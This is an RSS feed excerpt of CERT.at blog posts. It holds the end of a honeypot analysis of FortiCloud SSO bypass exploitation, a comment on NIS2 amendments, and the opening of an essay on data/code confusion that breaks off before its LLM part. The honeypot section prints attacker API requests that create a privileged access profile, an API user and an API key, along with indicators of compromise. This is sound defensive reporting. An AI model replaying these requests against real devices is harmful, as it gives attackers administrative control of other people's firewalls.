&lt;p class=&quot;block&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;[REDACTED]&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;information&quot; vd=&quot;root&quot; logdesc=&quot;Admin login successful&quot; sn=&quot;[REDACTED]&quot; user=&quot;admin&quot; ui=&quot;jsconsole&quot; method=&quot;jsconsole&quot; srcip=[REDACTED] dstip=[REDACTED] action=&quot;login&quot; status=&quot;success&quot; reason=&quot;none&quot; profile=&quot;super_admin&quot; msg=&quot;&lt;strong&gt;Administrator admin logged in successfully from jsconsole&lt;/strong&gt;&quot;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;0100044546&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;information&quot; vd=&quot;root&quot; logdesc=&quot;Attribute configured&quot; user=&quot;admin&quot; ui=&quot;jsconsole(192.168.2.254)&quot; action=&quot;Edit&quot; cfgtid=983367680 cfgpath=&quot;system.console&quot; cfgattr=&quot;output[more-&amp;gt;standard]&quot; msg=&quot;&lt;strong&gt;Edit system.console&lt;/strong&gt; &quot;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;[REDACTED]&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;alert&quot; vd=&quot;root&quot; logdesc=&quot;Configuration changed&quot; user=&quot;admin&quot; ui=&quot;jsconsole&quot; msg=&quot;&lt;strong&gt;Configuration is changed in the admin session&lt;/strong&gt;&quot;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;In these logs, we can see that the console was used, but there is no information on what exactly has happened.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Fifth Campaign&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A few hours later I noticed another different exploitation. This time, the thread actor performed three requests, which created a new access profile, a new API user, and finally an API key for them. The requests look like:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;POST /api/v2/cmdb/system/accprofile?vdom=root&lt;br /&gt;{&lt;strong&gt;&quot;name&quot;: &quot;system_api&quot;,&lt;/strong&gt; &quot;scope&quot;: &quot;vdom&quot;, &quot;comments&quot;: &quot;&quot;, &quot;secfabgrp&quot;: &quot;read-write&quot;, &quot;ftviewgrp&quot;: &quot;read-write&quot;, &quot;authgrp&quot;: &quot;read-write&quot;, &quot;sysgrp&quot;: &quot;read-write&quot;, &quot;netgrp&quot;: &quot;read-write&quot;, &quot;loggrp&quot;: &quot;read-write&quot;, &quot;fwgrp&quot;: &quot;read-write&quot;, &quot;vpngrp&quot;: &quot;read-write&quot;, &quot;utmgrp&quot;: &quot;read-write&quot;, &quot;wanoptgrp&quot;: &quot;read-write&quot;, &quot;wifi&quot;: &quot;read-write&quot;, &quot;netgrp-permission&quot;: {&quot;cfg&quot;: &quot;none&quot;, &quot;packet-capture&quot;: &quot;none&quot;, &quot;route-cfg&quot;: &quot;none&quot;}, &quot;sysgrp-permission&quot;: {&quot;admin&quot;: &quot;none&quot;, &quot;upd&quot;: &quot;none&quot;, &quot;cfg&quot;: &quot;none&quot;, &quot;mnt&quot;: &quot;none&quot;}, &quot;fwgrp-permission&quot;: {&quot;policy&quot;: &quot;none&quot;, &quot;address&quot;: &quot;none&quot;, &quot;service&quot;: &quot;none&quot;, &quot;schedule&quot;: &quot;none&quot;, &quot;others&quot;: &quot;none&quot;}, &quot;loggrp-permission&quot;: {&quot;config&quot;: &quot;none&quot;, &quot;data-access&quot;: &quot;none&quot;, &quot;report-access&quot;: &quot;none&quot;, &quot;threat-weight&quot;: &quot;none&quot;}, &quot;utmgrp-permission&quot;: {&quot;antivirus&quot;: &quot;none&quot;, &quot;ips&quot;: &quot;none&quot;, &quot;webfilter&quot;: &quot;none&quot;, &quot;emailfilter&quot;: &quot;none&quot;, &quot;data-loss-prevention&quot;: &quot;none&quot;, &quot;file-filter&quot;: &quot;none&quot;, &quot;application-control&quot;: &quot;none&quot;, &quot;icap&quot;: &quot;none&quot;, &quot;voip&quot;: &quot;none&quot;, &quot;waf&quot;: &quot;none&quot;, &quot;dnsfilter&quot;: &quot;none&quot;, &quot;endpoint-control&quot;: &quot;none&quot;}, &quot;admintimeout-override&quot;: &quot;disable&quot;, &quot;admintimeout&quot;: 10, &quot;system-diagnostics&quot;: &quot;enable&quot;}&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;POST&amp;nbsp;/api/v2/cmdb/system/api-user?datasource=1&amp;amp;vdom=root&amp;amp;with_meta=1&lt;br /&gt;{&lt;strong&gt;&quot;name&quot;: &quot;automation_user&quot;&lt;/strong&gt;, &quot;comments&quot;: &quot;automation_user&quot;, &lt;strong&gt;&quot;accprofile&quot;: {&quot;q_origin_key&quot;: &quot;system_api&quot;}&lt;/strong&gt;, &quot;vdom&quot;: [{&quot;name&quot;: &quot;root&quot;}], &quot;schedule&quot;: &quot;&quot;, &quot;cors-allow-origin&quot;: &quot;&quot;, &quot;peer-auth&quot;: &quot;disable&quot;, &quot;peer-group&quot;: &quot;&quot;, &quot;trusthost&quot;: []}&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;POST /api/v2/monitor/system/api-user/generate-key?vdom=root&lt;br /&gt;{&quot;api-user&quot;:&lt;strong&gt; &quot;automation_user&quot;&lt;/strong&gt;}&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The related log entries look like:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;[REDACTED]&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;information&quot; vd=&quot;root&quot; logdesc=&quot;Object attribute configured&quot; user=&quot;admin&quot; ui=&quot;GUI([REDACTED])&quot; action=&quot;Add&quot; cfgtid=[REDACTED] cfgpath=&quot;system.accprofile&quot; cfgobj=&quot;system_api&quot; cfgattr=&quot;secfabgrp[read-write]ftviewgrp[read-write]authgrp[read-write]sysgrp[read-write]netgrp[read-write]loggrp[read-write]fwgrp[read-write]vpngrp[read-write]utmgrp[read-write]wanoptgrp[read-write]wifi[read-write]&quot; msg=&quot;&lt;strong&gt;Add system.accprofile system_api&lt;/strong&gt;&quot;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;[REDACTED]&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;information&quot; vd=&quot;root&quot; logdesc=&quot;Object attribute configured&quot; user=&quot;admin&quot; ui=&quot;GUI([REDACTED])&quot; action=&quot;Add&quot; cfgtid=[REDACTED] cfgpath=&quot;system.api-user&quot; cfgobj=&quot;automation_user&quot; cfgattr=&quot;comments[automation_user]accprofile[system_api]&quot; msg=&quot;&lt;strong&gt;Add system.api-user automation_user&lt;/strong&gt;&quot;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;It seems like this user was then used to download the configuration, but unfortunately the corresponding request is missing in my honeypot logs, most likely due to an issue in my code I discovered later. Interestingly, the FortiOS log entry about downloading configuration seems to be issued shortly &lt;em&gt;before&lt;/em&gt; logs about creating the user, and this pattern is present in logs from two different FortiGate instances.&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;eventtime=[REDACTED] tz=&quot;+0100&quot; logid=&quot;[REDACTED]&quot; type=&quot;event&quot; subtype=&quot;system&quot; level=&quot;warning&quot; vd=&quot;root&quot; logdesc=&quot;Admin performed an action from GUI&quot; user=&quot;automation_user&quot; ui=&quot;RESTAPI([REDACTED])&quot; action=&quot;download&quot; status=&quot;success&quot; msg=&quot;&lt;strong&gt;System config file has been downloaded by user automation_user via RESTAPI&lt;/strong&gt;([REDACTED])&quot;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I only observed this campaign on the 22nd of December. The same IP originating from the AWS IP range exploited two different FortiGates but used two different names for created API users.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Real Exploit&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The real exploit is still not easy to find online, but my colleague Erik was able to discover and obtain a working script from a toolkit used by an unknown threat actor. The behavior consists of collecting the configuration backup and creating a new admin user, but possible usernames differ from those observed in the honeypot activity. As such, we are pretty confident that the exploit has started to spread among multiple threat actors, and we expect more to discover it.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Consequences&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The exploitation allows gaining full administrative control over the device, and the different exploitation attempts are still happening. Intentionally or not, some created accounts used weak passwords, and they have been quickly (in a few hours since creation) caught in brute-forcing attempts... Surprisingly, all by the same IP 178.22.24.20 that started brute force attempts against my honeypots on 2025-12-13, and it seems to use a quite limited set of credentials.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Until last Tuesday, we all believed that the vulnerability was patched, and we could just patiently wait for the next one. The recent report [10] suggests that has never been the case, although we still wait for the official confirmation. More importantly, some public comments suggest the existence of a vulnerability in the general SAML support, contrary to current statements that the scope is limited to FortiCloud SSO. This is not yet confirmed, as there is no evidence available.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Finally, it is important to mention that the flaw exists - so far - only on the management interface. We at CERT.at, and also Fortinet itself [11], strongly recommend keeping management interfaces out of the public internet, regardless of the authentication method used. To highlight the reason for this recommendation (besides newly published vulnerabilities targeting management interfaces), below you can see the number of login attempts to the management interface of one of my FortiGate honeypots in the last two months. On average, it&amp;rsquo;s about 50 thousand attempts daily.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20260122-forticloud/fortigate-bruteforce.png&quot; width=&quot;900&quot; height=&quot;151&quot; /&gt;&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Timeline&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;em&gt;Time in UTC&lt;/em&gt;&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;2025-12-12, around 9 am &amp;ndash; first exploit attempts using public available (invalid) PoCs&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;2025-12-12, around 10 am &amp;ndash; first scans directly for enabled FortiCloud SSO&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;2025-12-19, around 3 pm &amp;ndash; enabling FortiCloud SSO on honeypots&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;2025-12-19, around 9 pm &amp;ndash; first successful exploitation (Campaign 1)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;2025-12-20, around 8 am &amp;ndash; first successful configuration dump (Campaign 2)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;2025-12-21, around 2 am &amp;ndash; first new user created (Campaign 3)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;2025-12-22, around 2 am &amp;ndash; first configuration dump using terminal in GUI (Campaign 4)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;2025-12-23, around 8 am &amp;ndash; first profile and API user created (Campaign 5)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Now &amp;ndash; exploitation did not stop; almost all campaigns are still active. Last recorded exploitation: 2026-01-22&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Indicators of Compromise&lt;/h2&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Usernames used in the initial authorization bypass&lt;/h3&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;admin&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;support@forticloud.com&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;admin.workspace@gmail.com&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Created access profiles&lt;/h3&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;admin_api&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;system_api&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Created API users&lt;/h3&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;apiadmin&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;automation_user&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Created admin accounts&lt;/h3&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;sync&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;reports&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;forti-autosync&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;monitor&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;master_admin&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;security_admin&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;root_admin&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;admin1&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;admin2&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;adm1n&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;adm2n&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;admin3&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;roadmin&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;IP addresses performing exploitation&lt;/h3&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;38.60.203.31&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;185.173.235.232&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;161.35.185.133&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;216.126.237.142&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;45.131.153.211&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;138.197.113.70&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;45.152.65.134&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;16.79.57.21&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;223.254.128.15&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;43.173.167.151&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;103.106.230.140&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;167.71.200.26&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;81.90.188.105&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;149.255.35.151&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;108.61.187.236&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;em&gt;Known VPN and proxies were excluded from the list.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;References&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[1] &lt;a href=&quot;https://www.fortiguard.com/psirt/FG-IR-25-647&quot;&gt;https://www.fortiguard.com/psirt/FG-IR-25-647&lt;/a&gt;&lt;br /&gt;[2] &lt;a href=&quot;https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719/&quot;&gt;https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719/&lt;/a&gt;&lt;br /&gt;[3] &lt;a href=&quot;https://www.vulncheck.com/blog/forticloud-sso-login-bypass&quot;&gt;https://www.vulncheck.com/blog/forticloud-sso-login-bypass&lt;/a&gt;&lt;br /&gt;[4] &lt;a href=&quot;https://www.cert.at/de/warnungen/2025/12/kritische-sicherheitslucken-in-mehreren-fortinet-produkten-forticloud-sso-aktiv-ausgenutzt-updates-verfugbar&quot;&gt;https://www.cert.at/de/warnungen/2025/12/kritische-sicherheitslucken-in-mehreren-fortinet-produkten-forticloud-sso-aktiv-ausgenutzt-updates-verfugbar&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[5] &lt;a href=&quot;https://www.linkedin.com/posts/drayagha_for-the-latest-fortigate-cves-cve-2025-59718-activity-7407214356226281473-K0vf&quot;&gt;https://www.linkedin.com/posts/drayagha_for-the-latest-fortigate-cves-cve-2025-59718-activity-7407214356226281473-K0vf&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[6] &lt;a href=&quot;https://github.com/darses/nuclei-templates/blob/fe913cc2030e33d69fdb5b1265483995f05e66ab/drafts/fortinet-fortios-cloudsso-detect.yaml&quot;&gt;https://github.com/darses/nuclei-templates/blob/fe913cc2030e33d69fdb5b1265483995f05e66ab/drafts/fortinet-fortios-cloudsso-detect.yaml&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[7] &lt;a href=&quot;https://github.com/rix4uni/cvemapping/blob/7111dd6bac7aef9a4e324e38920851cfd41e36f0/2025/CVE-2025-59718/CVE-2025-59718.py&quot;&gt;https://github.com/rix4uni/cvemapping/blob/7111dd6bac7aef9a4e324e38920851cfd41e36f0/2025/CVE-2025-59718/CVE-2025-59718.py&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[8] &lt;a href=&quot;https://github.com/fortinet-solutions-cse/fortiosapi/blob/de593924f2b1018f1bfc85d4487858bdb676ebfc/tests/test_fortiosapi_virsh.py#L326&quot;&gt;https://github.com/fortinet-solutions-cse/fortiosapi/blob/de593924f2b1018f1bfc85d4487858bdb676ebfc/tests/test_fortiosapi_virsh.py#L326&lt;/a&gt;&lt;br /&gt;[9] &lt;a href=&quot;https://github.com/fortinet-solutions-cse/fortiosapi/blob/master/fortiosapi/fortiosapi.py#L387&quot;&gt;https://github.com/fortinet-solutions-cse/fortiosapi/blob/master/fortiosapi/fortiosapi.py#L387&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[10] &lt;a href=&quot;https://www.reddit.com/r/fortinet/comments/1qibdcb/possible_new_sso_exploit_cve202559718_on_749/&quot;&gt;https://www.reddit.com/r/fortinet/comments/1qibdcb/possible_new_sso_exploit_cve202559718_on_749/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[11] &lt;a href=&quot;https://docs.fortinet.com/document/fortigate/7.6.0/best-practices/317406/management-network&quot;&gt;https://docs.fortinet.com/document/fortigate/7.6.0/best-practices/317406/management-network&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[12]&amp;nbsp;&lt;a href=&quot;https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-configuration-changes-fortinet-fortigate-devices-via-sso-accounts/&quot;&gt;https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-configuration-changes-fortinet-fortigate-devices-via-sso-accounts/&amp;nbsp;&lt;/a&gt;&lt;/p&gt;</description><pubDate>Thu, 22 Jan 2026 16:41:10 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/1/look-at-forticloud-sso-bypass-exploitation</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-01-22T16:41:10Z</dc:date></item><item><title>A patch for the NIS2 Directive</title><link>https://www.cert.at/en/blog/2026/1/a-patch-for-the-nis2-directive</link><description>&lt;p class=&quot;block&quot;&gt;On January 20th, 2026 the &lt;a href=&quot;https://ec.europa.eu/commission/presscorner/detail/en/ip_26_105&quot;&gt;EU Commission presented a package of legislative proposals&lt;/a&gt;, including an update to the NIS2 directive.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In software terms, this would be a maintenance release. Fix some issues that came up while trying to run the program (well, installing it in all 27 Member States certainly took longer that expected), adapt it to a changing environment while hopefully being a simple change.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Obvious bug-fixes are:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;a minimum size for DNS server operators be relevant&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;don't make every large company with a bit of PV on the roof an entity in the electricity sector&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Adaptions concern things like the inclusion of Providers of European Digital Identity Wallets and special reporting requirements for ransomware cases.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;And what might change for us CSIRTs?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The commission proposes a change to the definition of the CSIRTs network:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;The CSIRTs network shall be composed of representatives of the CSIRTs designated or established pursuant to Article 10, the computer emergency response team for the Union&amp;rsquo;s institutions, bodies and agencies (CERT-EU) &lt;strong&gt;and ENISA&lt;/strong&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;ENISA also receives a fully new article Article 37a which describes ENISA&amp;rsquo;s role in mutual assistance.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This should be read in conjuction with the newly proposed update to the &lt;a href=&quot;https://digital-strategy.ec.europa.eu/en/library/proposal-regulation-eu-cybersecurity-act&quot;&gt;Cybersecurity Act&lt;/a&gt; which defines the role of ENISA. This one is still on my reading list.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I'm ambivalent on this. Yes, ENISA is increasingly doing operational work, tracking incidents accross Europe and providing alerts and statistics. But they don't do incident response. They facilitate and coordinate. This might change, and yes, the CSA might contain a few easter eggs in that direction.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;What is missing in the proposal?&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;As &lt;a href=&quot;https://www.cert.at/de/blog/2025/11/ein-kurzer-blick-auf-das-nisg-2026&quot;&gt;I have written in the German blog&lt;/a&gt;, Recital (44) in the NIS2 text originated from the EP's version going into the trilogue, but the corresponding articles didn't make it into the final directive. It should be struck by this update to clear up the confusion it caused.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Article 15(3)n references &quot;regional and Union-Level Security Operations Centres (SOCs)&quot;. Back when this was written, we didn't really know what this is all about, but as far as I can see, this is a reference to the &quot;national and cross-border SOCs&quot; from early Cyber Solidarity Act drafts. In the final version, these are now called &quot;national and cross-border cyber hubs&quot;, so I think that the update to the NIS2 text should harmonize the language. Adding a reference to the CSoA there wouldn't hurt, either.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Clear up the confusion regarding national cooperation forums. There is Article 11(4) which might be related to Article 19 and then there are the national cyber hubs from the CSoA. Are these separate things? Do they overlap? See also &lt;a href=&quot;https://www.cert.at/en/blog/2023/9/european-cyber-shield&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;And then there is the evergreen of the CNW definition with &quot;representatives of CSIRTs&quot; and the use of the term &quot;national CSIRT&quot;. I'll just &lt;a href=&quot;https://www.cert.at/en/blog/2021/11/an-update-on-the-state-of-the-nis2-draft&quot;&gt;link to my previous rant&lt;/a&gt; on these points.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is a quick reaction to the proposal from the Commission. I might write a more detailed review in the future.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&lt;/p&gt;</description><pubDate>Wed, 21 Jan 2026 17:59:06 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/1/a-patch-for-the-nis2-directive</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-01-21T17:59:06Z</dc:date></item><item><title>Don't say &quot;Jehova&quot; to an LLM</title><link>https://www.cert.at/en/blog/2025/12/dont-say-jehova-to-an-llm</link><description>&lt;p&gt;The Rabbi in the old skit from Monty Python's &quot;Life of Brian&quot; fell for it, and for a long time, philosophers argued whether quoting someone is fundamentally different to just saying the sentence. I remember a story where one actor smuggled a wedding promise in a co-actor's copy of his lines: After the vow was made on the set and the sentence couldn't be found in the official script: is the actor now bound in real life by his promise?&lt;/p&gt;&#13;
&lt;p&gt;This mix of semantic levels is also at the core of a lot of cyber security problems: data gets misinterpreted as code and so an attacker can achieve code execution. With the emergence of LLMs, this never-ending story gets a new twist.&lt;/p&gt;&#13;
&lt;p&gt;But first, let's first give some context and background - and no, I won't go back to antiquity again.&lt;/p&gt;&#13;
&lt;h1&gt;In-Band signalling&lt;/h1&gt;&#13;
&lt;p&gt;In some communication networks, certain control signals are mixed into the payload. The perhaps most famous case was the US phone network, where a tone of 2600 Hz was used to signal various state-changes within the phone network.&lt;/p&gt;&#13;
&lt;p&gt;That tone should only be generated by the operators own equipment, but if one of their customers injects that tone by blowing suitable whistle, then it was interpreted by the network as well. That &lt;a href=&quot;https://en.wikipedia.org/wiki/Phreaking&quot;&gt;enabled interesting use-cases&lt;/a&gt;, not all of which were in the best interest of the network operator.&lt;/p&gt;&#13;
&lt;p&gt;It's the same problem: is the network just transmitting a tone, or is it sending a signal to another node?&lt;/p&gt;&#13;
&lt;p&gt;I've also seen several cases where humans put processing instructions in data fields that were supposed to contain content. If the other side is not a human, or perhaps someone who doesn't speak the same language, then those instructions are not followed, but taken as a literal input, e.g. &lt;a href=&quot;https://whatsthejam.com/lifestyle/mum-left-howling-after-t-shirt-from-temu-comes-with-very-awkward-mistake/&quot;&gt;text to be printed on a t-shirt&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p&gt;It can also be the other way round: An LLM is asked to produce a text, but instead of just writing the desired article, it also prints a preamble like &quot;An suitable essay for your question could be the following:&quot; and a footer that contains hints to improve prompting &quot;If you want to spice up your story, do X or Y.&quot;. Hilarity ensues if a &lt;a href=&quot;https://bsky.app/profile/plocaploca.bsky.social/post/3m4kbikwcbc2l&quot;&gt;journalist&lt;/a&gt; or a student copies the full answer - including preamble and &lt;a href=&quot;https://uebermedien.de/110661/ki-programm-quatscht-in-spiegel-text-einfach-dazwischen/&quot;&gt;instructions&lt;/a&gt; - into their final product.&lt;/p&gt;&#13;
&lt;p&gt;I never used speech to text systems, but I think their worst case is dictating the manual for this system: You need to describe the voice commands that trigger actions like &quot;delete last word&quot; or &quot;start boldface now&quot;, but in this case the system shouldn't treat them as commands but insert them as text into the document. This is also not new, numerous skits and movies used the trope of a secretary transcribing comments that were not intended to be included in the dictation.&lt;/p&gt;&#13;
&lt;h1&gt;The Von Neumann architecture - Buffer overflow&lt;/h1&gt;&#13;
&lt;p&gt;One of the major features of the currently prevailing computer architecture is the generic nature of memory. RAM is a place to store arbitrary pieces of information: it just remembers and retrieves patterns of bits, but it does not care how the CPU will interpret those bits. If you use tools to peek at the memory content during debugging, you need to tell the debugger how to interpret the data, that's why debugging symbols left by the compiler in the executable can be handy.&lt;/p&gt;&#13;
&lt;p&gt;One consequence of this type-agnostic memory is that bug in software regarding where to store data can cause a data/code confusion: an old-school buffer overflow in the stack is exactly this: The program wants to store a piece of data and overshoots the allocated memory and ends up overwriting the return value which causes the CPU to interpret the newly received data as code and execute it.&lt;/p&gt;&#13;
&lt;p&gt;Mitigations against this have a long history: the &lt;a href=&quot;http://www.bitsavers.org/www.computer.museum.uq.edu.au/pdf/DEC-11-HGKTCB-D%20PDP-1145%20Memory%20Management%20Reference%20Manual.pdf&quot;&gt;PDP11/45 with its MMU&lt;/a&gt; had already the concept of distinct Instruction vs. Data space. Modern processors also allow the operating systems to tag virtual memory regions as non-executable. The emergence of &lt;a href=&quot;https://en.wikipedia.org/wiki/Return-oriented_programming&quot;&gt;Return Oriented Programming&lt;/a&gt; gave the attackers a way to work around this protection.&lt;/p&gt;&#13;
&lt;p&gt;To summarize: The program received a piece of data, made mistakes in storing it and so the sequence of bytes was turned from e.g., a string of characters into a sequence of machine code commands (or a sequence of references to code gadgets).&lt;/p&gt;&#13;
&lt;p&gt;The best way to eliminate this kind of problem is to use a memory-safe language. It really shouldn't be up to the coder to make sure that buffer size constraints are checked on every write.&lt;/p&gt;&#13;
&lt;p&gt;Less effective, another defence against such attacks emerged with signature-based anti-virus software. The idea is that the shell code contained input data could be detected, and the processing of such dangerous input could be aborted.&lt;/p&gt;&#13;
&lt;p&gt;Apple recently announced their &quot;&lt;a href=&quot;https://security.apple.com/blog/memory-integrity-enforcement/&quot;&gt;Memory Integrity Enforcement&lt;/a&gt;&quot; which is a creative way to link pointers to memory regions which should eliminate out-of-bound writes. Let's see how this will work out in practice.&lt;/p&gt;&#13;
&lt;h1&gt;SQL-Injection&lt;/h1&gt;&#13;
